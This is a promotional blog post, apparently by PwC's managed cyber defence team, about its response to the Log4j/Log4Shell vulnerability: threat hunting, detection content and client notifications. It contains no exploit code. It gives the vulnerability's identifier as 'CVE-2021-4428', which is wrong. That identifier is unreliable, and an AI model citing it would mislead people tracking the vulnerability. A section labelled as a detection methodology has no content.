Managed Cyber Defence in Action - Responding to Log4J

A new security risk is causing upheaval in the cybersecurity world after it first gained widespread coverage on the evening of Friday 10 December 2021. 

As with all major vulnerability disclosures, they never happen at a convenient time! On Friday evening, the security world sprung into action as CVE-2021-4428, better known as log4j and its supporting exploit, Log4Shell, landed as an early Christmas present for us all. 

Log4j is a Java software library (or building block) which can be built into applications to help perform logging and monitoring. Libraries such as log4j are easy to integrate and thus widely used, across both open and closed source applications.

Very early in the incident, details emerged on the internet which allowed people to test their servers and understand their exposure. However, similar code also surfaced that would allow remote code execution (RCE) allowing anybody, including relatively unsophisticated threat actors, to use basic tools and launch successful attacks. There were also indications that exploitations have been taking place since at least the 1st of December.

The challenge with a vulnerability like this is in its breadth - this is code used across multiple systems and applications, with over 140,000 open source projects alone using the library, therefore the potential scope of its impact is both hard to identify and laborious to address even when the right patches are released. 

For our managed cyber defence team, our immediate response was two-fold:

• Help our clients understand their exposure and implement short term mitigations

• Understand how attackers are using these exploits in the wild to further tune our detection content. 

Immediate response from a global team

The immediate focus was on protecting our clients’ estates - our managed security operations services are built on the Palo Alto Networks, Cortex XDR and XSOAR platforms, and our 24/7 team immediately began to apply our threat hunting techniques to identify potentially vulnerable endpoints across all of our clients’ estates. 

In parallel our global detection engineering team began to translate initial indicators of compromise (IoCs) and threat intelligence into actionable behavioural indicators of compromise (BIoCs) that would give us the ability to detect and respond to attempts to exploit the newly disclosed vulnerabilities. Our platforms also had signatures put in place to detect, block and alert our clients thanks to the fast actions of our friends at Palo Alto Networks.

By Saturday morning, as most of the western world was waking up to the news, our team of analysts from both the UK and New Zealand, had already presented each of our clients with comfort that any exploitation attempts would be blocked but also with a list of endpoints on their estate that our platform has identified as carrying the vulnerability. Meanwhile software vendors across the globe began the process of releasing appropriate patches. 

The hard work starts here

Whilst it was great to take a minute and appreciate the steps that had been taken to help protect our clients in the short term, we are well aware that the hard work really starts now, as threat actors begin to use more advanced TTPs to target log4j.

We are fortunate that we have an industry leading Threat Intelligence team to continue to track this threat and feed our detection engineering team with the latest TTPs & IOCs in order to continue to enhance and define the detection content within our platform, and guide our ongoing threat hunting activities that we perform daily across all of our clients estates:

PwC detection methodology 

It was thanks to these fast-moving actions across our Cyber teams and our partners that we can remain confident that we are keeping abreast of the latest threats. Also having processes in place to help mitigate or remediate these issues whether they happen at 9am on a Monday morning, or (more likely!) 6pm on a Friday evening!

To find out more about our Managed Cyber Defence or Threat Intelligence services please contact: Julian Bruce-Miller, Director.